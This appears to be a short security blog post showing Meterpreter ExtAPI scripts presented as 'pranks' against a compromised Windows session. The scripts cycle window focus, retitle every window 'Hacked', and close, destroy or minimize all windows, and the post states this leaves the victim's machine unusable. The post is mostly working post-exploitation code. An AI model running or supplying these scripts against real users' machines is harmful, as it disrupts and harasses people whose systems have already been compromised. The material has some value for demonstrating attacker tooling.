ExtAPI Pranks

Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write up on it and more amazing things he did in 3 months of meterpreter and on the Metasploit blog.

Just brushing the surface and to help people see the power of this new functionality I went ahead and created a few Meterpreter scripts that can really mess with someone.

1st is a script that loops through all of the windows for your current user and sets the focus to them in rotation. Essentially making their machine unusable.

• Source: https://gist.github.com/mubix/8050500

12345678910111213

# Code loops around each of the windows# that the current user has open and switches# focus to each of them in rotation... 100 times.(0..100).eachdo|x|windows=client.extapi.window.enumeratewindows.eachdo|winder|ifwinder[:title]!='Default IME'result=client.railgun.user32.SetForegroundWindow(winder[:handle])endendprint_status("Round #{x}")end

2nd just sets all of the windows title’s the say “hacked”

• Source: https://gist.github.com/mubix/8050592

123456

windows=client.extapi.window.enumeratewindows.eachdo|winder|ifwinder[:title]!='Default IME'result=client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked")endend

and finally if in Windows if you close all of the windows, including “invisible” ones like Explorer, you will essentially make the machine unusable.

• Source: https://gist.github.com/mubix/8050653

1234

windows=client.extapi.window.enumeratewindows.eachdo|winder|result=client.railgun.user32.CloseWindow(winder[:handle])end

OJ suggested a few other options:

Destroy:

1234

windows=client.extapi.window.enumeratewindows.eachdo|winder|result=client.railgun.user32.DestroyWindow(winder[:handle])end

or Minimize all:

1234

windows=client.extapi.window.enumeratewindows.eachdo|winder|result=client.railgun.user32.ShowWindow(winder[:handle],6)end

Thats it for now, next up we will do a few things with services as well as the clipboard. Stay tuned!